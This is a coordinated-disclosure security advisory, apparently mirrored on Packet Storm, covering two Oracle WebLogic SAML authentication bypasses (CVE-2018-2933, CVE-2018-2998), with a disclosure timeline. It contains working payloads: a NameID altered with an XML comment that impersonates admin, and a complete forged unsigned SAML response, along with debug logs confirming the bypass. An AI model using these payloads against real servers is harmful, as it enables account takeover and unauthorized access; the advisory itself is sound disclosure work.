Twenty Year Anniversary

Oracle Fusion Middleware 12c (12.2.1.3.0) WebLogic SAML Issues

Oracle Fusion Middleware 12c (12.2.1.3.0) WebLogic SAML Issues
Posted Jul 20, 2018
Authored by Denis Andzakovic

Two vulnerabilities were discovered within the Oracle WebLogic SAML service provider authentication mechanism. By inserting an XML comment into the SAML NameID tag, an attacker can coerce the SAML service provider to log in as another user. Additionally, WebLogic does not require signed SAML assertions in the default configuration. By omitting the signature portions from a SAML assertion, an attacker can craft an arbitrary SAML assertion and bypass the authentication mechanism.

tags | exploit, arbitrary, vulnerability
advisories | CVE-2018-2933, CVE-2018-2998
MD5 | 8148b832465acbeccd85c4e873dbde29

Oracle Fusion Middleware 12c (12.2.1.3.0) WebLogic SAML Issues

Change Mirror Download
Oracle WebLogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933)

Release URL: https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities
Date Released: 18/07/2018
CVE: CVE-2018-2998 CVE-2018-2933
Author: Denis Andzakovic
Vendor Website: http://www.oracle.com
Affected Software: Oracle Fusion Middleware 12c (12.2.1.3.0) WebLogic Server

--[ Description

Two vulnerabilities were discovered within the Oracle WebLogic SAML service provider authentication mechanism. By inserting an XML comment into the SAML NameID tag, an attacker can coerce the SAML service provider to log in as another user. Additionally, WebLogic does not require signed SAML assertions in the default configuration. By omitting the signature portions from a SAML assertion, an attacker can craft an arbitrary SAML assertion and bypass the authentication mechanism.

--[ SAML Authentication Bypass

By inserting an XML comment, an attacker can coerce the WebLogic SAML Service Provider to log in as another user. When an XML comment is added inside a NameID tag, the WebLogic server only processes the string after the comment. Adding the XML comment does not invalidate the SAML assertionas signature.

For example; an attacker who can register the user attackeradmin with the identity provider may log in, tamper the resulting valid SAML assertion without invalidating the signature and gain access as the admin user. The following figure details the tampered assertion (the full assertion has been omitted for brevity):

<saml2:Assertion>
<saml2:Subject xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
<saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">attacker<!---->admin</saml2:NameID>
</saml2:Subject>
</saml2:Assertion>

The following figure shows the relevant debug log lines. Complete log lines have been omitted for brevity:

<Debug> <SecuritySAML2Service> <weblogic.localdomain> <AdminServer> <[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS Kernel>> <> <94584814-7693-4517-b1ce-d6cf53870dcb-00000043> <1524397013394> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <BASE64 decoded saml message:_ommited_<saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">attacker<!---->admin</saml2:NameID>_ommited_
<Debug> <SecuritySAML2Atn> <weblogic.localdomain> <AdminServer> <[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS Kernel>> <> <94584814-76934517-b1ce-d6cf53870dcb-00000043> <1524397013408> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <DefaultSAML2NameMapperImpl: mapName: Mapped name: qualifier: null, name: admin>
<Debug> <SecuritySAML2Atn> <weblogic.localdomain> <AdminServer> <[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS Kernel>> <> <94584814-76934517-b1ce-d6cf53870dcb-00000043> <1524397013408> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <SAMLIACallbackHandler: callback[0]: NameCallback: setName(admin)>


--[ SAML Insecure Defaults - Missing Signature Verification

In the default configuration, WebLogic does not require SAML assertions to be signed. If the signature section is omitted from a SAML response, then no signature verification is performed. This behavior can be used to bypass authentication and gain access as an arbitrary user. The SingleSignOnServicesMBean.WantAssertionsSigned MBean attribute is not present by default.

In this default configuration, an attacker may remove the Signature tags from the SAML assertion, tamper the assertion (usually setting the ds:NameID to a target user) and log in as any user. The following XML shows an example SAML assertion for a user called aadmina with the Signature tags removed.

<?xml version="1.0" encoding="UTF-8"?>
<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:7001/saml2/sp/acs/post" ID="id39453084082248801717742013" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0">
<saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" Format="urn:oasis:names:tc:SAML:2.0:nameidformat:entity">REDACTED</saml2:Issuer>
<saml2p:Status xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">
<saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />
</saml2p:Status>
<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="id3945308408248426654986295" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0">
<saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">REDACTED</saml2:Issuer>
<saml2:Subject xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
<saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameidformat:unspecified">admin</saml2:NameID>
<saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml2:SubjectConfirmationData NotOnOrAfter="2018-04-22T10:33:53.593Z" Recipient="http://localhost:7001/saml2/sp/acs/post" />
</saml2:SubjectConfirmation>
</saml2:Subject>
<saml2:Conditions NotBefore="2018-04-22T10:23:53.593Z" NotOnOrAfter="2018-0422T10:33:53.593Z" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
<saml2:AudienceRestriction>
<saml2:Audience>WLS_SP</saml2:Audience>
</saml2:AudienceRestriction>
</saml2:Conditions>
<saml2:AuthnStatement AuthnInstant="2018-04-22T10:28:49.876Z" SessionIndex="id1524392933593.694282512" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
<saml2:AuthnContext>
<saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef>
</saml2:AuthnContext>
</saml2:AuthnStatement>
</saml2:Assertion>
</saml2p:Response>


--[ Timeline

26/04/2018 - Advisory sent to Oracle
26/04/2018 - Advisory acknowledged
27/04/2018 - Case numbers S1003812 and S1003820 assigned to track the SAML authentication bypass and insecure defaults, respectively
25/05/2018 - Automated email update received from Oracle
23/06/2018 - Email from Oracle requesting a the disclosure for the insecure defaults to be delayed until at least October
26/06/2018 - Automated email update received from Oracle
05/07/2018 - Response sent to Oracle, advised the original disclosure date will remain
14/07/2018 - Oracle advised both issues are fixed in the upcoming July 17th critical patch update
18/07/2018 - Advisory released

--[ About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    16 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close